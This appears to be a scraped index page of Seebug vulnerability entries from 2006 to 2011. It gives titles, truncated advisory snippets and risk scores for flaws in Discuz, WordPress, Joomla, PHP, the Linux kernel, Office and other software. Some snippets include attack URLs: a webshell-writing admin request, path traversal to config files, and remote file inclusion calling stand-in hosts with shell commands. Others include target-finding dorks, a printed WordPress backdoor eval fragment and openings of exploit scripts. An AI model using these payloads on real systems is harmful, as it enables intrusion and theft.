Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2011/05/05 12:0 a.m.59 views

Discuz! NT 3.1.0 后台拿webshell

简要描述: 通过后台写入执行代码,直接拿到webshell,从而掌握服务器权限。 详细说明: 1、访问http://127.0.0.1/admin/global/globaltemplatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 2、写入aspx木马后,访问http://127.0.0.1/tools/rss.aspx就可以了。 漏洞证明:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2011/04/15 12:0 a.m.59 views

Microsoft Excel Office Art远程代码执行漏洞(MS11-021)

BUGTRAQ ID: 47226 CVE ID: CVE-2011-0979 Microsoft Excel是由Microsoft为Windows和Apple Macintosh操作系统的电脑而编写和运行的一款试算表软件。 Microsoft Excel在实现上存在缓冲区溢出漏洞,远程攻击者可利用此漏洞以当前用户权限执行任意代码,造成拒绝服务。 Microsoft Office Excel处理特制Excel文件的方式中存在一个远程执行代码漏洞,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户 Microsoft...

9.3CVSS6.8AI score0.26523EPSS
Exploits1
seebug.org
seebug.org
added 2011/03/18 12:0 a.m.59 views

Linux Kernel "ldm_frag_add()"缓冲区溢出漏洞

CVECAN ID: CVE-2011-1017 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel在LDM分区处理实现上存在缓冲区溢出漏洞,本地攻击者可利用此漏洞控制受影响系统。 此漏洞源于fs/partitions/ldm.c中的"ldmfragadd"函数中的错误,可通过插入具有特制LDM分区的USB设备造成缓冲区溢出。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.kernel.org/...

7.2CVSS0.1AI score0.00614EPSS
Exploits3
seebug.org
seebug.org
added 2011/03/18 12:0 a.m.59 views

PHP "substr_replace()"释放后重用远程内存破坏漏洞

BUGTRAQ ID: 46843 CVE ID: CVE-2011-1148 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP的"substrreplace"函数在实现上存在释放后重用远程内存破坏漏洞,远程攻击者可利用此漏洞在网络服务器中执行任意代码,造成拒绝服务。 此漏洞源于在将同一个变量多次发送到"substrreplace"函数时,PHP会使该函数中的三个变量使用同一个指针,所以当函数中的类型转换更改了该指针,该指针也会使其他变量无效。 PHP PHP 5.3.x PHP PHP 5.2.x 厂商补丁: PHP ---...

7.5CVSS8.2AI score0.04736EPSS
Exploits1
seebug.org
seebug.org
added 2010/12/09 12:0 a.m.59 views

Linux Kernel <= 2.6.37 Local Privilege Escalation

No description provided by source. / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg @djrbliss on twitter Usage: gcc full-nelson.c -o full-nelson ./full-nelson This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage: CVE-2010-4258...

6.2CVSS0.2AI score0.02655EPSS
Exploits11
seebug.org
seebug.org
added 2010/10/17 12:0 a.m.59 views

Microsoft Office HtmlDlgHelper Class Memory Corruption

No description provided by source. Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory Id: CORE-2010-0517 Advisory URL:...

9.3CVSS0.28842EPSS
Exploits7
seebug.org
seebug.org
added 2010/09/13 12:0 a.m.59 views

ShopEx的漏洞.

简要描述: 你懂的 详细说明: 看漏洞证明 漏洞证明: url/shopadmin/index.php?ctl=sfile&act=getDB&p0=../../config/config.php 你懂的...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/09/02 12:0 a.m.59 views

BlueCMS v1.6 sp1 $_SERVER注射漏洞

BlueCMS是一个地方分类信息门户专用CMS系统。 程序在使用getip函数获取客户端ip时没有严格过滤数据,导致sql注射漏洞。 //comment.php $sql = "INSERT INTO ".table'comment'." comid, postid, userid, type, mood, content, pubdate, ip, ischeckVALUES '', '$id', '$userid', '$type', '$mood', '$content', '$timestamp', '".getip."', '$ischeck'"; // 注意getip...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2010/06/10 12:0 a.m.59 views

Office Excel OBJ记录解析栈溢出漏洞(MS10-038)

BUGTRAQ ID: 40520 CVE ID: CVE-2010-0822 Excel是微软Office套件中的电子表格工具。 Excel在解析电子表格中的畸形OBJ(recType 0x5D)记录时存在栈溢出漏洞,用户受骗打开了畸形的Excel文档就会导致执行任意代码。 Microsoft Excel 2002 SP3 Microsoft Office 2008 for Mac Microsoft Office 2004 for Mac 临时解决方法: 不要打开从不可信任来源接收到或从可信任来源意外接收到的Excel文件。 厂商补丁: Microsoft ---------...

9.3CVSS2.4AI score0.70121EPSS
Exploits21
seebug.org
seebug.org
added 2010/04/08 12:0 a.m.59 views

Mozilla Firefox浏览器强制URL拖放操作权限提升漏洞

CVECAN ID: CVE-2010-0178 Firefox是一款流行的开源WEB浏览器。 浏览器Applet可能错误的将单个鼠标点击动作解释为拖放操作,这可能导致在用户浏览器中非预期的加载资源。攻击者可以连续两次利用这种行为,第一次在用户浏览器中加载特权的chrome: URL,之后在同一文档之上加载恶意的javascript: URL,导致以chrome权限执行任意脚本。 Mozilla Firefox 3.6 Mozilla Firefox 3.5.x Mozilla Firefox 3.0.x Mozilla SeaMonkey 2.0.4 补丁安装方法: 1. 手工安装补丁...

7.6CVSS0.1AI score0.03431EPSS
Exploits1
seebug.org
seebug.org
added 2010/03/24 12:0 a.m.59 views

Mozilla Firefox 3.6 window.location对象非授权数据访问漏洞

CVE ID: CVE-2010-0170 Firefox是一款流行的开源WEB浏览器。 由于开发了新的机制来强制窗口与帧之间的同源策略,Firefox 3.6的浏览器引擎将window.location对象更改为正常的可覆盖JavaScript对象。但一些插件也使用这个对象判断页面来源以实施访问限制,因此恶意网页可以通过覆盖这个对象欺骗插件允许到其他站点或本地文件系统上数据的访问。 Mozilla Firefox 3.6 厂商补丁: Mozilla ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mozilla.org/...

4.3CVSS9.3AI score0.01566EPSS
Exploits1
seebug.org
seebug.org
added 2010/03/14 12:0 a.m.59 views

Samba CAP_DAC_OVERRIDE文件权限绕过安全限制漏洞

BUGTRAQ ID: 38606 CVE ID: CVE-2010-0728 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 如果启用了libcap支持,则所有的smbd进程都继承了CAPDACOVERRIDE功能标记,这允许通过认证的远程用户通过标准的文件系统操作绕过预期的文件权限限制读写访问文件。 Samba Samba 3.5.0 Samba Samba 3.4.6 Samba Samba 3.3.11 厂商补丁: Samba ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

8.5CVSS7.5AI score0.03845EPSS
Exploits1
seebug.org
seebug.org
added 2010/02/20 12:0 a.m.59 views

FFmpeg多个媒体文件解析拒绝服务和代码执行漏洞

BUGTRAQ ID: 36465 CVE ID: CVE-2009-4631,CVE-2009-4632,CVE-2009-4633,CVE-2009-4634,CVE-2009-4635,CVE-2009-4636,CVE-2009-4637,CVE-2009-4638,CVE-2009-4639,CVE-2009-4640 FFmpeg是一套对音频和视频进行解码录制转换的完整方案。 ffmpeg解析各种媒体文件时存在多个空指针引用、内存越界或死循环等漏洞,可能导致拒绝服务或执行任意代码。 1 解析AVI、.ogv和.wmv文件时的空指针引用和0除数错误可能导致崩溃。 2...

10CVSS0.5AI score0.17038EPSS
Exploits11
seebug.org
seebug.org
added 2009/12/11 12:0 a.m.59 views

"Sunbird 0.9 Array Overrun (code execution) 0day"

No description provided by source. full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253 Sunbird 0.9 Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk: High...

6.8CVSS0.1AI score0.28167EPSS
Exploits43
seebug.org
seebug.org
added 2009/11/17 12:0 a.m.59 views

HP Openview NNM 7.53 Invalid DB Error Code Vulnerability

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ HP Openview NNM 7.53 Invalid DB Error Code vulnerability 1. Advisory Information Title: HP Openview NNM 7.53 Invalid DB Error Code...

5CVSS0.1AI score0.09342EPSS
Exploits12
seebug.org
seebug.org
added 2009/11/11 12:0 a.m.59 views

Microsoft Word记录解析栈溢出漏洞(MS09-068)

BUGTRAQ ID: 36950 CVE ID: CVE-2009-3135 Word是微软Office套件中的文件处理工具。 Word处理包含有畸形文件信息块(FIB)结构的特制Word文件的方式中存在栈溢出。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Office 2008 for Mac Microsoft Office 2004 for Mac Microsoft Word Viewer 200...

9.3CVSS6.8AI score0.35792EPSS
Exploits1
seebug.org
seebug.org
added 2009/11/10 12:0 a.m.59 views

Apple Mac OS X 2009-006更新修复多个安全漏洞

BUGTRAQ ID: 36956 CVE ID:...

9.3CVSS0.6AI score0.0578EPSS
Exploits5
seebug.org
seebug.org
added 2009/10/30 12:0 a.m.59 views

VMware PF异常本地权限提升漏洞

BUGTRAQ ID: 36841 CVECAN ID: CVE-2009-2267 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 在受保护的模式中,cpl通常等于cs寄存器最不重要的两位,但也有一个例外:在Virtual-8086模式中,无论cs寄存器为何值cpl总是为 3(最少权限)。当处理器出现PF异常时,会向包含有标记的栈上Push一个异常代码,操作系统使用这个标记确定正确地操作阶段。其中的一个标记为 U/S(user/supervisor),当处理器处于用户态时出现错误会设置这个标记。...

6.9CVSS6.6AI score0.01755EPSS
Exploits4
seebug.org
seebug.org
added 2009/09/03 12:0 a.m.59 views

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)

No description provided by source. / second verse, same as the first CVE-2009-2698 udpsendmsg, x86/x64 Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at NULL and finding it executed This exploit is a bit more nuanced and thoughtful ; use ./therebel.sh for everything At this...

7.2CVSS0.2AI score0.07121EPSS
Exploits18
seebug.org
seebug.org
added 2009/07/30 12:0 a.m.59 views

MySQL Connector/J Unicode字符串SQL注入漏洞

Bugraq ID: 35858 MySQL Connector/J是一款面向java的简单易用的API调用接口。 MySQL Connector/J处理包含部分unicode字符的查询字符串时存在错误,远程攻击者可以利用漏洞通过SQL注入攻击修改应用程序,访问或修改数据。 在设置类似SJIS/Windows-31J字符集而不是UTF-8的情况下,提交包含U+00A5字符的字符串,MySQL Connector/J在处理时可导致SQL注入攻击,攻击者可以获得敏感数据或操作数据库。 MySQL AB MySQL Connector/J 5.1.7 厂商解决方案 MYSQL...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2009/06/01 12:0 a.m.59 views

OpenSSL 'dtls1_retrieve_buffered_fragment()' DTLS报文拒绝服务漏洞

Bugraq ID: 35138 CVE ID:CVE-2009-1379 OpenSSL是一款开放源码的SSL实现,用来实现网络通信的高强度加密。 OpenSSL 'dtls1retrievebufferedfragment'存在设计问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当运行: ./openssl sserver -dtls1 -noecdhe -timeout -cert large.pem 并执行如下命令: ./openssl sclient -dtls1 会在客户端触发段错误,GDB显示错误发生在d1both.c:539行: return...

5CVSS7.7AI score0.18241EPSS
Exploits2
seebug.org
seebug.org
added 2009/05/12 12:0 a.m.59 views

Linux Kernel keyctl_join_session_keyring()函数本地拒绝服务漏洞

BUGTRAQ ID: 33339 CVECAN ID: CVE-2009-0031 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的security/keys/keyctl.c文件中的keyctljoinsessionkeyring函数存在内存泄漏漏洞,本地用户可以利用kfree相关方式耗尽内核内存,导致拒绝服务的情况。 Linux kernel 2.6.x 厂商补丁: Debian ------ Debian已经为此发布了一个安全公告(DSA-1794-1)以及相应补丁: DSA-1794-1:New Linux 2.6.18...

4.9CVSS0.1AI score0.00408EPSS
Exploits1
seebug.org
seebug.org
added 2009/04/14 12:0 a.m.59 views

Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit

No description provided by source. !/usr/bin/env perl Flatnuke = 2.7.1 level Privilege Escalation 0-day Exploit Description ----------- Flatnuke contains one flaw that may allow a user to become administrator. The issue is due to 'sections/noneLogin/section.php' script not properly sanitizing use...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/04/02 12:0 a.m.59 views

MapServer mapserv程序多个远程安全漏洞

BUGTRAQ ID: 34306 CVECAN ID: CVE-2009-0839,CVE-2009-0840,CVE-2009-0841,CVE-2009-0843,CVE-2009-0842,CVE-2009-1176,CVE-2009-1177 MapServer是用于创建交互式地图应用的多平台程序。 MapServer中存在多个安全漏洞,可能允许远程攻击者泄露敏感信息、绕过安全限制、导致拒绝服务或入侵有漏洞的系统。 1 如果远程攻击者向服务器上传了恶意地图文件或通过id参数传送了包含有超过128字节字符串的特制请求的话,就可以在mapserv...

10CVSS0.6AI score0.09011EPSS
Exploits7
seebug.org
seebug.org
added 2009/01/06 12:0 a.m.59 views

Samba注册表共享名非授权访问漏洞

BUGTRAQ ID: 33118 CVECAN ID: CVE-2009-0022 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 启用了注册表共享的Samba没有正确地验证共享名,通过认证的攻击者可以通过使用较老版本的smbclient并指定空字符串为共享名(如smbclient //server/ -U user%pass)来访问root文件系统。 Samba 3.2.0 - 3.2.6 临时解决方法: 通过registry shares = no禁用注册表共享。 厂商补丁: Samba -----...

6.3CVSS0.1AI score0.03534EPSS
Exploits1
seebug.org
seebug.org
added 2008/12/23 12:0 a.m.59 views

webcamXP URL目录遍历漏洞

BUGTRAQ ID: 32928 webcamXP是一款商业网络摄像头软件,集成了用于共享视频的Web服务器。 webcamXP没有正确地处理URL编码的斜线,远程攻击者可以通过提交恶意URL请求执行目录遍历攻击,读取服务器上的任意文件。 moonware studios webcamXP 5.3.2.410 build 2132 厂商补丁: moonware studios ---------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.webcamxp.com...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/06/22 12:0 a.m.59 views

UltraEdit FTP/SFTP LIST命令目录遍历漏洞

BUGTRAQ ID: 29784 UltraEdit是HTML、HEX文本和PHP、Perl等编程语言的多用途编辑器。 UltraEdit内置的FTP/SFTP浏览器没有正确地过滤FTP服务器响应LIST命令所返回文件名中的斜线和反斜线。如果用户受骗从服务器下载了整个目录的话,就可能导致向用户机器上的任意位置写入文件。 IDM Computer Solutions UltraEdit 14.00b IDM Computer Solutions ---------------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/03/13 12:0 a.m.59 views

XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability

No description provided by source. AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MA陌L : [email protected] DORKS 1 : allinurl :"/modules/tutorials/" DORK 2 : allinurl :"/modules/tutorials/"tid EXPLOIT 1 :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/01/22 12:0 a.m.59 views

boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability

No description provided by source. ...:::::boastMachine =3.1 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hacke...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/21 12:0 a.m.59 views

Adobe Flash Player ActiveX控件通用跨站脚本漏洞

Adobe Flash Player是一款流行的FLASH播放程序。 Adobe Flash Player包含的ActiveX控件处理navigateToURL API存在缺陷,远程攻击者可以利用漏洞进行跨站脚本攻击,可获得敏感信息或进行其他攻击。 navigateToURL API函数接收两个参数,URL和要浏览的帧名,SWF动画可在javascript: URI中传递而帧名可是其他域的帧名,这可导致URI执行在其他帧安全上下文中执行,攻击者可以构建恶意WEB页,诱使用户访问来触发。 RedHat Enterprise Linux Supplementary v.5 server...

4.3CVSS0.2AI score0.12931EPSS
Exploits1
seebug.org
seebug.org
added 2007/11/05 12:0 a.m.59 views

PHP Helpdesk Login SQL注入漏洞

PHP Helpdesk是一款基于PHP的WEB应用程序。 PHP Helpdesk不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击,可获得敏感信息或未授权访问应用程序。 问题是由于登录脚本对用户提交的参数缺少过滤,提交恶意SQL查询作为参数数据,可绕过验证未授权访问应用程序。 PHP Helpdesk 0.6.16 目前没有详细解决方案提供: http://phphelpdesk.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/10/25 12:0 a.m.59 views

Lotus Domino任意访问内存映射文件漏洞

BUGTRAQ ID: 26146 CVECAN ID: CVE-2007-5544 Lotus Domino/Notes服务器是一款基于WEB协同工作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。 Lotus Domino的IPC机制实现上存在漏洞,本地攻击者可能利用此漏洞提升权限。 Lotus Domino的NLNOTES和NTASKLDR间进程间通讯(IPC)机制是通过内存映射的文件执行的,在创建文件时向ACL参数传送了NULL,导致EVERYONE都赋予了完全控制权限。...

6.2CVSS6.4AI score0.0027EPSS
Exploits1
seebug.org
seebug.org
added 2007/10/23 12:0 a.m.59 views

RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞

BUGTRAQ ID: 26130 CVECAN ID: CVE-2007-5601 RealPlayer是一款流行的媒体播放器,支持多种媒体格式。 RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。 由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。 Real Networks RealPlayer 1...

9.3CVSS6.4AI score0.42365EPSS
Exploits9
seebug.org
seebug.org
added 2007/10/08 12:0 a.m.59 views

Public Media Manager newstopic_inc.php远程文件包含漏洞

Public Media Manager是一款基于PHP的WEB应用程序。 Public Media Manager不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是由于'newstopicinc.php'脚本对用户提交的'indir'参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以以WEB权限执行任意命令。 Public Media Manager Public Media Manager 1.3 目前没有解决方案提供: http://pmm-cms.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/02 12:0 a.m.59 views

XOOPS Module icontent 1.0 Remote File Inclusion Exploit

No description provided by source. html head meta http-equiv="Content-Type" content="text/html; charset=windows-1254" titleXOOPS Module icontent v.1.0 Remote File Inclusion Exploit/title script language="JavaScript"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/11 12:0 a.m.59 views

MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

No description provided by source. html title MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification /title body OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0" /OBJECT script language="vbscript" //next script is converted to UTF16...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/08 12:0 a.m.59 views

Linux Kernel RTA_MAX越界访问漏洞

Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel代码实现上存在漏洞,本地攻击可能利用此漏洞对系统造成拒绝服务。 Linux内核代码中存在一个错误,将RTAMAX而不是RTNMAX错误地用做了数组的大小,导致dnfibprops(dnfib.c,DECNet)和fibprops(fibsemantics.c,IPv4)函数中可能出现越界访问的情况,造成内核崩溃。 Linux kernel 2.6.21-rc6 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2007/04/25 12:0 a.m.59 views

Joomla! PCLTar.PHP远程文件包含漏洞

Joomla!是一款基于PHP的WEB应用程序。 Joomla!不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'PCLTar.PHP'脚本对用户提交的'gpcltarlibdir'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Joomla 1.5.0 Beta 目前没有解决方案提供: http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/24 12:0 a.m.59 views

WEBinsta FM login.php远程文件包含漏洞

WEBinsta FM是一款易用的基于Web的文件管理系统。 WEBinsta FM实现上存在输入验证漏洞,远程攻击者可能利用此漏洞服务器上执行任意命令。 在WEBinsta FM的/admin/login.php文件中: ifisset$COOKIE'adminname' && isset$COOKIE'adminpass' $cusername = $COOKIE'adminname'; $cpassword = $COOKIE'adminpass'; include$absolutepath."admin/checkpass.php";...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/04 12:0 a.m.59 views

Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Wordpress 2.1.2 SQL Injection POC Credits: [email protected] Thanks to ferruh [email protected] improving my exploitation skills website:www.notsosecure.com Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/03/09 12:0 a.m.59 views

Wordpress 2.1.1远程命令执行后门漏洞

WordPress是一款免费的论坛Blog系统。 WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。 被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码: 在wp-includes/feed.php文件中: function commenttextphpfilter$filterdata eval$filterdata; ... if $GET"ix"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/24 12:0 a.m.59 views

CA eTrust Security Command Center and eTrust Audit 存在多个漏洞

CA eTrust Security Command Center eSCC和eTrust Audit是CA产品安全命令执行和审核程序。 CA eTrust Security Command Center eSCC和eTrust Audit存在多个安全问题,远程攻击者可以利用漏洞获得敏感信息,执行任意文件删除或者重播攻击。 第一个问题是允许攻击者发现在windows平台上的web服务器路径信息,此漏洞影响eTrust Security Command Center Server 1.0, r8, r8 SP1 CR1, 和r8 SP1 CR2版本。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/20 12:0 a.m.59 views

Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit

No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...

8.5CVSS0.1AI score0.13782EPSS
Exploits9
seebug.org
seebug.org
added 2006/12/16 12:0 a.m.59 views

AnnoncesV Annonce.PHP远程文件包含漏洞

AnnoncesV是一款基于PHP的WEB应用程序。 AnnoncesV不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Annonce.PHP'脚本对用户提交的'cmd'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 annoncesV annoncesV 1.1 http://www.comscripts.com/scripts/php.annoncesv.1895.html http://www.example.com/annonce.php?page=yourcode.txt?cmd=id...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/12 12:0 a.m.59 views

PSlash lvc_include_dir远程文件包含漏洞

PSlash是一款基于PHP的WEB应用程序。 PSlash不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'config.inc.php'脚本对用户提交的'lvcincludedir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Derek Leung pSlash 0.70 http://www.pslash.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/10 12:0 a.m.59 views

Anti-Spam SMTP Proxy Server未授权文件访问漏洞

Anti-Spam SMTP Proxy Server是一款反垃圾邮件SMTP代理服务器。 Anti-Spam SMTP Proxy Server不正确限制用户的访问,远程攻击者可以利用漏洞访问系统上文件获得敏感信息。 John Hanna Anti-Spam SMTP Proxy ASSP Server 1.2.3 http://assp.sourceforge.net/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/08 12:0 a.m.59 views

Intel网卡驱动本地权限提升漏洞

Intel Pro 100/1000是英特尔推出的系列网卡设备。 所有的Intel网卡驱动(NDIS miniport驱动)中都存在一个栈溢出漏洞,本地攻击者可能利用此漏洞提升自己在系统中的权限。 尽管NDIS miniport驱动占用的是低层,非特权用户态代码仍可以通过需要由NDIS实现的网卡统计请求与该驱动通讯。如果攻击者能够向\Device\adapterguid发送IOCTLNDISQUERYSELECTEDSTATS 0x17000E请求的话,就会导致NDIS.SYS调用...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/08/17 12:0 a.m.59 views

pcAnywhere认证拒绝服务漏洞

BUGTRAQ ID: 15646 CVECAN ID: CVE-2005-3934 Symantec pcAnywhere是全球最畅销的用于管理服务器和提供管理人员支持的远程控制解决方案。 pcAnywhere在处理特制消息的时候存在溢出漏洞,可能导致拒绝服务。由于溢出发生在认证之前,因此远程攻击者无需有效的凭据便可利用这个漏洞。 Symantec pcAnywhere 11.5.1 Symantec pcAnywhere 11.0.1 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.8CVSS6.4AI score0.09464EPSS
Exploits1
seebug.org
seebug.org
added 2006/06/17 12:0 a.m.59 views

Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Joomla = 1.0.9 'Weblinks' blind SQL injection / admin credentials\r\n"; echo "disclosure exploit benchmark vesion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; if $argc5...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/05/19 12:0 a.m.59 views

phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities

No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...

7.1AI score
Exploits0
Total number of security vulnerabilities5000